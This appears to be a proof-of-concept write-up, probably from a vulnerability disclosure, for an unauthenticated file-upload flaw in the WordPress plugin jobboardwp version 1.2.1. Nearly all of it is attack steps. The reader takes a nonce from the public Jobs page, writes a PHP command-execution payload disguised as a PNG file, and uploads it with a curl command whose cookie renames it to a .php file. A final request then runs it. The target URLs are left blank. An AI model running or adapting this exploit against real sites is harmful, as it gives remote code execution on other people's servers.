1. Install the vulnerable plugin (jobboardwp version 1.2.1)
2. In the toast message that appears on the plugin's installation page, create the required pages for the plugin to work properly


1. As an unauthenticated user, extract the nonce from the "Jobs" page (by default /?page_id=5), CTRL+F for "jb_front_data"
2. Prepare a payload you want to upload, ensure that the filename ends with ".png":

echo '<?php passthru("id"); ?>' > /tmp/payload.png

3. Invoke the following curl command, with the nonce embedded, to upload the payload:

curl '' \
    -H 'Cookie: jb-logo-upload=payload.php' \
    -F 'nonce=<NONCE>' \
    -F 'chunks=1' \
    -F 'file=@/tmp/payload.png' \

4. Trigger the payload by accessing it (the location of the payload is returned by the curl command above):

curl ''